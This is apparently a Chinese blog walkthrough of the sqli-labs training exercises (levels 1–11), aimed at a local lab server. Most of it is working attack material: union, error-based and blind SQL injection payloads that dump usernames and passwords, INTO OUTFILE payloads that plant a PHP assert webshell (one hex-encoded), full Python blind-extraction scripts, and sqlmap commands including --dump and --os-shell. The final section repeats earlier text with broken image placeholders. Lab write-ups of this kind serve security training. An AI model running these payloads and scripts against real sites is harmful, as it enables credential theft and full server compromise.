参考链接:
详细sqli-labs(1-65)通关讲解_糊涂是福yyyy的博客-CSDN博客
MySQL group_concat()函数 - MySQL教程 (yiibai.com)
SQLMAP 脱库过程(post请求,三种方法)_sqlmap怎么脱_doubboCode的博客-CSDN博客
你的个人信息是如何被盗走的?MySQL脱库,脱库的原理,怎么脱库,脱库的步骤,一库三表六字段_数据脱库是什么意思_士别三日wyx的博客-CSDN博客
mysql数据库备份(脱裤) - 简书 (jianshu.com)
盲注: updatexml()函数的理解
详解MySQL的UPDATEXML()函数:更新 XML 文档中的节点值 - Python技术站 (pythonjishu.com)
SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)_concat 0x7e_头顶蜘蛛网,脚踩大水缸的博客-CSDN博客
Markdown+Typora使用教程_typora怎么用markdown_NikkoLKR的博客-CSDN博客(图床的设置)
mysql数据库函数的使用:
show databases;
show tables;
user information_schema; --选择information_schema数据库
show columns from table_1 --显示table_1表的属性,各个字段的状态
select * from tables limit 0,1; --显示informaiton_schema数据库中,表tables 中的内容
select group_concat(table_name) from information_schema.tables where table_schema='security';
select group_concat(column_name) from information_schema.columns where table_name='users';
select group_concat(column_name) from information_schema.columns where table_name='users';
select group_concat(username,id,password) from security.users;
less1-'闭合,报错注入
1.输入http://192.168.199.129/Less-1/?id=1‘ 报错
2.输入http://192.168.199.129/Less-1/?id=1’ and 1=1 --+ 成功
则判断存在字符型漏洞
3.查看源代码
less2.整型 报错注入
1.输入 http://192.168.199.129/Less-2/?id=2 成功
2.输入 http://192.168.199.129/Less-2/?id=2%27%20and%201=1–+ (id=2’ and 1=1–+) 失败
3.输入:http://192.168.199.129/Less-2/?id=2%20and%201=1%20–+ (id=2 and 1=1 --+)成功
4.查看源代码:
5.显示输入注入后的sql语句
判断存在整型漏洞
1.联合注入 利用order 1,2,3 判断输出几列:
http://192.168.199.129/Less-2/?id=2%20order%20by%201%20–+ (id=2 and order by 1–+)
第四列根本不存在,所以一共有三列
"SELECT * FROM users WHERE id=$id LIMIT 0,1"
"SELECT * FROM users WHERE id=1 ' LIMIT 0,1"出错信息。
?id=1 order by 3
?id=-1 union select 1,2,3
?id=-1 union select 1,database(),version()
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
?id=-1 union select 1,2,group_concat(username ,id , password) from users
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile '/var/www/html/Less-2/less2.php' --+
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile 'less2.php' --+
?id=-1%20union%20select%201,2,%27%3C?php%20assert($_POST[less2]);?%3E%27%20into%20outfile%20%27C:/less2.php%27--%20s
------------------------------------------------
union select 1,2,group_concat(column_name) from information_schema.colums where table_name='users'
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
将less2.php文件写入 主机中,路径为默认路径,并使用 find / -name ‘less2.php’ ,查找文件在哪里
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile 'less2.php' --+
#该条语句失败
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile '/var/www/html/Less-2/less2.php' --+
less3 有回显示,’)闭合 union 注入
#copy
?id=1 order by 3
?id=-1 union select 1,2,3
?id=-1 union select 1,database(),version()
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
?id=-1 union select 1,2,group_concat(username ,id , password) from users
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile '/var/www/html/Less-2/less2.php' --+
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile 'less2.php' --+
?id=1
?id=1' and 1=1 --+
?id=1 and 1=1 --+
?id=1' and 1=1 --+ #成功
?id=1' order by 1 --+ , ?id=1' order by 2 --+ ,?id=1' order by 8 --+
?id=1') order by 3 --+ #成功
?id=1') order by 4 --+ #报错
?id=-1') union select 1,2,3 --+
?id=-1') union select 1,2,user() --+
?id=-1') union select 1,2,database() --+ #security
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ #查找数据库中的表名 emails,referers,uagents,users
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where
table_name='users' --+ #id,username,password
?id=-1') union select 1,2,group_concat(username,id,password) from security.users --+
通过改写php代码,可以发现 id的注入点如下:
less4-有回显,双引号,括号闭合 union注入
/Less-4/?id=1 #SELECT * FROM users WHERE id=("1") LIMIT 0,1
/Less-4/?id=1") and 1=1 --+
/Less-4/?id=1") order by 3 --+
/Less-4/?id=1") order by 4 --+
/Less-4/?id=-1") union select 1,2,3 --+
/Less-4/?id=-1") union select 1,2,database() --+
/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
/Less-4/?id=-1") union select 1,2,group_concat(username,id,password) from security.users -- +
Less-5 无回显,’ 闭合 报错注入
copy 仙女象 and 头顶蜘蛛网,脚踩大水缸
/-先看一个通俗易懂的例子:
select updatexml(“abc”,"//div/p/text()","abcd") 的意思是把"abc"换成"abcd" ,而服务器要通过xpath路径"//div/p/text()"找到"abc" 。
这时如果xpath路径格式出错了,则会把校验xpath路径后的结果通过报错信息显示出来,如果我们把xpath路径改成我们想知道的信息,结果就会通过报错信息显示出来。
例如改成select updatexml(“abc”,concat(“~”,database()),"abcd") 就可以通过报错信息得到当前服务器使用数据库的名字(如下图所示)。
-/
#获取当前数据库名称
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
#获取当前数据库所有表名称
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)-- s
#获取当前数据库user表所有列名称
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
#获取当前数据库user表所有username和password的值
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),63,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),94,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),125,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),156,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),187,31),0x7e),1)-- s
#下面这步写webshell
http://192.168.101.16/sqli-labs-master/Less-5/?id=1' into outfile 'C:/less5.php' lines terminated by 0x3c3f7068702061737365727428245f504f53545b6c657373355d293b3f3e-- s
SUBSTR (str, pos)
截取从pos位置开始到最后的所有str字符串
SUBSTR (str, pos, len)
参数说明:
str为列名/字符串;
pos为起始位置;mysql中的起始位置pos是从1开始的;如果为正数,就表示从正数的位置往下截取字符串(起始坐标从1开始),反之如果起始位置pos为负数,那么 表示就从倒数第几个开始截取;
len为截取字符个数/长度。
/Less-5/?id=1 #正确执行
/Less-5/?id=1' #语法报错
/Less-5/?id=1" #正确执行
/Less-5/?id=1' and 1=1 --+ #正确执行 ,判断 单引号闭合 ,无回显
#使用报错注入:
/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
#0X7e 其实就是字符 '~'
/Less-5/?id=1'and updatexml(1,concat('~',(select database()),0x7e),1)-- s #查询数据库
/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) -- s #查询该数据库中所有的表
#查询users表中所有的字段
/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
#查询users表中的内容
/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
在代码里面echo 一下执行的语句,可以看到执行语句
Less6 “闭合 没有回显 报错注入
/Less-6/?id=1
/Less-6/?id=1'
/Less-6/?id=abc #这个没有you are in
/Less-6/?id=1" #报错
/Less-6/?id=1' and 1=1 --s+ #正常运行,但是没有回显,所以 ’闭合 没有回显
/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) -- s
/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
substr('aaaaabbb...',1,62)似乎最大就能显示长度为32个字符字串
查看源码输出,发现是”闭合
Less7 '))闭合,布尔盲注 (后续还需要再跑手动注入一遍)
/Less-7/?id=1
如果手工注入的话,闭合可以用burpsuite爆破,这里就不写了。找到闭合之后,就可以开始爆库和写webshell了。
/Less-7/?id=1' #报错
/Less-7/?id=1" #正常
猜测因该是"闭合,无回显,有报错信息
/Less-7/?id=1 and 1=1
/Less-7/?id=1 and 1=1 --s #正常、
####
/Less-7/?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) -- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
该段python代码(判断数据库的值)的逻辑为:
1.使用二分法,判断数据库长度
假设数据库最大长度为n,利用二分法分为两个区间,找到真正的数据数据库长度
2.使用暴力遍历法,遍历数据库中的字符
建立一个字符列表k,然后进行n次查询,每次查询确当一个字符。一共进行 k*数据库的长度 (n)
#!/usr/bin/python3
# coding=utf-8
“”"
©️ Copyright © 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
“”"
import requests
url = "http://192.168.101.16/sqli-labs-master/Less-7/" #有可利用漏洞的url,根据实际情况填写
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",} #http request报文头部,根据实际情况填写
keylist = [chr(i) for i in range(33, 127)] #包括数字、大小写字母、可见特殊字符
flag = 'You are in' #用于判断附加sql语句为真的字符,根据网页回显填写
def CurrentDatabase7():
n = 10 #预测当前数据库名称最大可能的长度,根据实际情况填写
k = 0
j = n//2
length = 0
db = str()
while True:
if j>k and j<n and j-k>3:
payload1 = "1')) and length(database())>"+str(j)+"-- ss" #所有payload根据实际情况填写
print(payload1)
param = {
"id":payload1,
}
response = requests.get(url, params = param, headers = headers) #GET方法发送含payload的request
#print(response.request.headers)
#print(response.text)
if response.text.find(flag) != -1:
n=n
k=j
else:
k=k
n=j
j=(n-k)//2
elif j-k==3 or j-k<3:
for i in range(k-1,n+2):
payload2 = "1')) and length(database())="+str(i)+"-- ss"
param = {
"id":payload2,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print("the name of current database contains "+str(length)+" characters")
for i in range(1,length+1):
for c in keylist:
payload3 = "1')) and substring(database(),"+str(i)+",1)='"+c+"'-- ss"
param = {
"id":payload3,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
db = db+c
break
print("the name of current database is "+str(db))
def Tables7():
n = 100 #预测当前数据库中所有表名称最大可能的长度,根据实际情况填写
k = 0
j = n//2
length = 0
tname = str()
while True:
if j>k and j<n and j-k>3:
payload4 = "1')) and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+"-- ss"
param = {
"id":payload4,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
n=n
k=j
else:
k=k
n=j
j=(n-k)//2
elif j-k==3 or j-k<3:
for i in range(k-1,n+2):
payload5 = "1')) and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))="+str(i)+"-- ss"
param = {
"id":payload5,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print("the name of all tables in current database contains "+str(length)+" characters")
for i in range(1,length+1):
for c in keylist:
payload6 = "1')) and substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),"+str(i)+",1)='"+c+"'-- ss"
param = {
"id":payload6,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
tname = tname+c
break
print("the name of all tables in current database is "+str(tname))
def Columns7(table): #table参数是需要爆破的数据表名称,记得加单引号
n = 200 #预测某个表所有列名称最大可能的长度,根据实际情况填写
k = 0
j = n//2
length = 0
cname = str()
while True:
if j>k and j3:
payload7 = “1’)) and (length((select group_concat(column_name) from information_schema.columns where table_name = '”+table+“’ and table_schema = database())))>”+str(j)+“-- ss”
param = {
“id”:payload7,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
n=n
k=j
else:
k=k
n=j
j=(n-k)//2
elif j-k==3 or j-k<3:
for i in range(k-1,n+2):
payload8 = “1’)) and (length((select group_concat(column_name) from information_schema.columns where table_name = '”+table+“’ and table_schema = database())))=”+str(i)+“-- ss”
param = {
“id”:payload8,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print(“the name of all columns in current table contains “+str(length)+” characters”)
for i in range(1,length+1):
for c in keylist:
payload9 = “1’)) and substr((select group_concat(column_name) from information_schema.columns where table_name = '”+table+“’ and table_schema = database()),”+str(i)+“,1)='”+c+“'-- ss”
param = {
“id”:payload9,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
cname = cname+c
break
print("the name of all columns in current table is "+str(cname))
def Content7(table,col1,col2): #table参数是需要爆破的数据表名称,col1和col2是需要爆破内容的列,记得都要加单引号
n = 200 #预测期望获取的数据的最大可能的长度,根据实际情况填写
k = 0
j = n//2
length = 0
content = str()
while True:
if j>k and j<n and j-k>3:
payload10 = "1')) and (length((select group_concat(concat("+col1+",'^',"+col2+")) from "+table+")))>"+str(j)+"-- ss"
param = {
"id":payload10,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
n=n
k=j
else:
k=k
n=j
j=(n-k)//2
elif j-k==3 or j-k<3:
for i in range(k-1,n+2):
payload11 = "1')) and (length((select group_concat(concat("+col1+",'^',"+col2+")) from "+table+")))="+str(i)+"-- ss"
param = {
"id":payload11,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print("the content contains "+str(length)+" characters")
for i in range(1,length+1):
for c in keylist:
payload12 = "1')) and substr((select group_concat(concat("+col1+",'^',"+col2+")) from "+table+"),"+str(i)+",1)='"+c+"'-- ss"
param = {
"id":payload12,
}
response = requests.get(url, params = param, headers = headers)
if response.text.find(flag) != -1:
content = content+c
break
print("the content is "+str(content))
查看源代码: 发现是 ‘))闭合
通过跑脚本,可以爆破数据库
Less8-’ 闭合 布尔盲注
/Less-8/?id=1
/Less-8/?id=1' 报错
/Less-8/?id=1' and 1=1 --s 没有正确回显
#7和8这种盲注,似乎不能使用updatexml()语句进行回显,为什么???
/Less-8/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- s
因为else语句中,print(mysql_error());被注释了,所以用不了updatexml
使用脚本爆破:
#!/usr/bin/python3
# coding=utf-8
*"""
**functions for boolean-based sql injection(GET)
**:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
**:license: GNU General Public License v3.0, see LICENSE for more details.
**"""
**
*import requests
url = "http://192.168.199.129/Less-8/" # 有可利用漏洞的url,根据实际情况填写
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", } # http request报文头部,根据实际情况填写
keylist = [chr(i) for i in range(33, 127)] # 包括数字、大小写字母、可见特殊字符
flag = 'You are in' # 用于判断附加sql语句为真的字符,根据网页回显填写
def CurrentDatabaseGET():
n = 10 # 预测当前数据库名称最大可能的长度,根据实际情况填写
k = 0
j = n // 2
length = 0
db = str()
while True:
if j > k and j < n and j - k > 3:
payload1 = "1' and length(database())>" + str(j) + "-- ss" # 所有payload根据实际情况填写
param = {
"id": payload1,
}
response = requests.get(url, params=param, headers=headers) # GET方法发送含payload的request
\# print(response.request.headers)
\# print(response.text)
if response.text.find(flag) != -1:
n = n
k = j
else:
k = k
n = j
j = (n - k) // 2
elif j - k == 3 or j - k < 3:
for i in range(k - 1, n + 2):
payload2 = "1' and length(database())=" + str(i) + "-- ss"
param = {
"id": payload2,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print("the name of current database contains " + str(length) + " characters")
for i in range(1, length + 1):
for c in keylist:
payload3 = "1' and substring(database()," + str(i) + ",1)='" + c + "'-- ss"
param = {
"id": payload3,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
db = db + c
break
print("the name of current database is " + str(db))
def TablesGET():
n = 100 # 预测当前数据库中所有表名称最大可能的长度,根据实际情况填写
k = 0
j = n // 2
length = 0
tname = str()
while True:
if j > k and j < n and j - k > 3:
payload4 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>" + str(
j) + "-- ss"
param = {
"id": payload4,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
n = n
k = j
else:
k = k
n = j
j = (n - k) // 2
elif j - k == 3 or j - k < 3:
for i in range(k - 1, n + 2):
payload5 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))=" + str(
i) + "-- ss"
param = {
"id": payload5,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print("the name of all tables in current database contains " + str(length) + " characters")
for i in range(1, length + 1):
for c in keylist:
payload6 = "1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(
i) + ",1)='" + c + "'-- ss"
param = {
"id": payload6,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
tname = tname + c
break
print("the name of all tables in current database is " + str(tname))
def ColumnsGET(table): # table参数是需要爆破的数据表名称,记得加单引号
n = 200 # 预测某个表所有列名称最大可能的长度,根据实际情况填写
k = 0
j = n // 2
length = 0
cname = str()
while True:
if j > k and j < n and j - k > 3:
payload7 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())))>" + str(
j) + "-- ss"
param = {
"id": payload7,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
n = n
k = j
else:
k = k
n = j
j = (n - k) // 2
elif j - k == 3 or j - k < 3:
for i in range(k - 1, n + 2):
payload8 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())))=" + str(
i) + "-- ss"
param = {
"id": payload8,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print("the name of all columns in current table contains " + str(length) + " characters")
for i in range(1, length + 1):
for c in keylist:
payload9 = "1' and substr((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())," + str(
i) + ",1)='" + c + "'-- ss"
param = {
"id": payload9,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
cname = cname + c
break
print("the name of all columns in current table is " + str(cname))
def ContentGET(table, col1, col2): # table参数是需要爆破的数据表名称,col1和col2是需要爆破内容的列,记得都要加单引号
n = 200 # 预测期望获取的数据的最大可能的长度,根据实际情况填写
k = 0
j = n // 2
length = 0
content = str()
while True:
if j > k and j < n and j - k > 3:
payload10 = "1' and (length((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")))>" + str(
j) + "-- ss"
param = {
"id": payload10,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
n = n
k = j
else:
k = k
n = j
j = (n - k) // 2
elif j - k == 3 or j - k < 3:
for i in range(k - 1, n + 2):
payload11 = "1' and (length((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")))=" + str(
i) + "-- ss"
param = {
"id": payload11,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
length = i
break
break
else:
break
print("the content contains " + str(length) + " characters")
for i in range(1, length + 1):
for c in keylist:
payload12 = "1' and substr((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")," + str(
i) + ",1)='" + c + "'-- ss"
param = {
"id": payload12,
}
response = requests.get(url, params=param, headers=headers)
if response.text.find(flag) != -1:
content = content + c
break
print("the content is " + str(content))
CurrentDatabaseGET()
Less9-时间注入,’闭合
/Less-9/?id=1
/Less-9/?id=1'
/Less-9/?id=1"
/Less-9/?id=1 and 1=1 都是一样的
通过观察源代码发现, 为‘闭合, 因此构造时间盲注
/Less-9/?id=1' and if(1=1,sleep(10),0)-- s
copy 仙女象:需要替换url
#获取所有数据库名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dbs
#获取当前数据库
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --current-db
#获取数据库security所有表名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --tables -D security
#获取数据库security的users表的所有列名
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --columns -D security -T users
#获取数据库security的users表的username和password列的值
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dump -D security -T users -C username,password
#写马
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --os-shell
从代码中可以看到,该sql语句中,不管是正确还是错误,其输入都是一样的
通过下面语句发现,过一段时间,页面才会刷新
Less10-时间盲注,”闭合
/Less-10/?id=1
/Less-10/?id=1'
/Less-10/?id=1"
回显都一样,因此猜测为输入sql语句正确,或错误其显示的内容都一样
可以使用sqlmap,进行时间盲注爆破
#获取当前数据库
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --current-db --technique T --level 3
#获取数据库security所有表名称
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --tables -D security --technique T --level 3
#获取数据库security的users表的所有列名
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --columns -D security -T users --technique T --level 3
#获取数据库security的users表的username和password列的值
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --dump -D security -T users -C username,password --technique T --level 3
这题如果用手工注入,可以试试改一改JacquelinXiang/sqli_blind: A simple tool/framework for boolean-based or time-based sql injection(blind) (github.com)的sqli_tb.py
与第九关相比,就是闭合不同。
可以看到回显相同,但是还是有细微的一些细节不同,其实也可可用用布尔注入去做的
sql注入基本思路:
判断闭合:
‘ “ ’) ”) 无闭合
首先判断是否有回显:
如果有回显,且有报错信息,则可以使用报错注入,或者union注入
如过没有回显:
使用时间盲注,
如果正确sql语句与错误sql语句返回的内容不一样,并且没有报错信息,则使用布尔盲注
Less11-post 注入
uname=ele'&passwd=paswd&submit=Submit #报错
uname=ele&passwd=paswd&submit=Submit #登录失败
取数据库security的users表的username和password列的值
python sqlmap.py -u “http://192.168.101.16/sqli-labs-master/Less-10/?id=1” --dump -D security -T users -C username,password --technique T --level 3
这题如果用手工注入,可以试试改一改JacquelinXiang/sqli_blind: A simple tool/framework for boolean-based or time-based sql injection(blind) (github.com)的sqli_tb.py
与第九关相比,就是闭合不同。
[外链图片转存中...(img-97zyxmUS-1695354518126)]
[外链图片转存中...(img-Sasw863b-1695354518126)]
可以看到回显相同,但是还是有细微的一些细节不同,其实也可可用用布尔注入去做的
[外链图片转存中...(img-rTrdOSOE-1695354518126)]
sql注入基本思路:
判断闭合:
‘ “ ’) ”) 无闭合
首先判断是否有回显:
如果有回显,且有报错信息,则可以使用报错注入,或者union注入
如过没有回显:
使用时间盲注,
如果正确sql语句与错误sql语句返回的内容不一样,并且没有报错信息,则使用布尔盲注
# Less11-post 注入
```mysql
uname=ele'&passwd=paswd&submit=Submit #报错
uname=ele&passwd=paswd&submit=Submit #登录失败
[外链图片转存中…(img-nmso39Z8-1695354518126)]
[外链图片转存中…(img-rlYJzMNv-1695354518127)]
[外链图片转存中…(img-MB5BKN8h-1695354518127)]
[外链图片转存中…(img-o7nnZfOG-1695354518127)]